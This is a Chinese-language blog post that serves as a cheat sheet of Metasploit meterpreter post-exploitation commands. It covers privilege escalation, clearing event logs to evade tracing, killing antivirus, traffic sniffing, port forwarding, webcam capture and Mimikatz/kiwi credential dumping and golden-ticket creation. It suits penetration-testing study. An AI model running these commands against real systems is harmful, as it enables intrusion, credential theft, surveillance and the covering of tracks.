当前位置:   article > 正文

Metasploit框架(3), meterpreter 常用命令, sniffer流量监听, portfwd端口转发, kiwi, Mimikatz密码破解_meterpreter load kiwi

meterpreter load kiwi

Metasploit框架(3), meterpreter 常用命令与扩展工具

进入到 meterpreter > 提示符环境下才能执行命令

一, 常用命令

sysinfo     # 系统信息
getuid      # 当前用户
getprivs    # 当前权限
load priv   # 加载priv
getsystem   # 提权到系统权限
clearev     # 清除系统日志, 安全日志, 避免朔源
quit        # 关闭 meterpreter, 关闭 session 连接, 退回msf模块控制台
shell       # 反弹shell, 进入目标主机的命令行, 退回 meterpreter: exit
pwd         # 当前目标主机目录
lpwd        # 当前本地主机目录
ps          # 查看所有进程
kill        # 关闭进程
getpid      # 当前meterpreter注入的进程
migrate pid # 把meterpreter迁移到其他进程
screenshot  # 屏幕截图
webcam_list # 查看摄像头, `webcam_snap -i 1 -v false` 间隔1秒拍照
background  # 后台挂起 meterpreter, 临时退出meterpreter, 不关闭 session, 切换回msf模块控制台. 
            # 在msf控制台输入 sessions 查看所有已打开的session, 
            # 使用 `sessions -i 序号` 命令可以重新进入对应的 meterpreter 控制台.
run			# 执行后渗透攻击脚本, 输入两次tab显示所有脚本的提示. 比如:
			# `run post/windows/manage/killav`  关闭杀毒软件进程
			# `run vnc`  开启vnc远程连接
upload      # 上传文件, `upload /home/3389.ext c:\\Test\\` 将3389.exe上传到目标主机c盘
download	# 下载文件, `download drupal.sql /home/kali` 将drupal.sql下载到本地目录
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24

二, 其他工具:

1. sniffer 流量监听工具
use sniffer        # 加载sniffer扩展模块
sniffer_interfaces # 列出网卡
sniffer_start 1    # 选择网卡开始抓包
sniffer_stats 1    # 查看状态
sniffer_dump 1 /tmp/a.pcap # 导出数据包, 可以通过wireshark分析.
sniffer_stop 1     # 停止抓包
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
2. portfwd 端口转发工具
portfwd list # 端口转发列表
portfwd add -l 1122 -p 2408 -r 127.0.0.1 # 将目标2408端口转发到本地系统1122端口.
  • 1
  • 2
3. kiwi (旧版名称: Mimikatz) 获取账户密码工具

注意: kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。

所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。

load kiwi # 加载工具
creds_all # 列出所有账户的凭证和明文密码.
password_change # 修改密码
wifi_list # 列出wifi配置
wifi_list_shared # 列出共享wifi配置/编码
golden_ticket_create # 创建黄金票据
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/456734
推荐阅读
相关标签
  

闽ICP备14008679号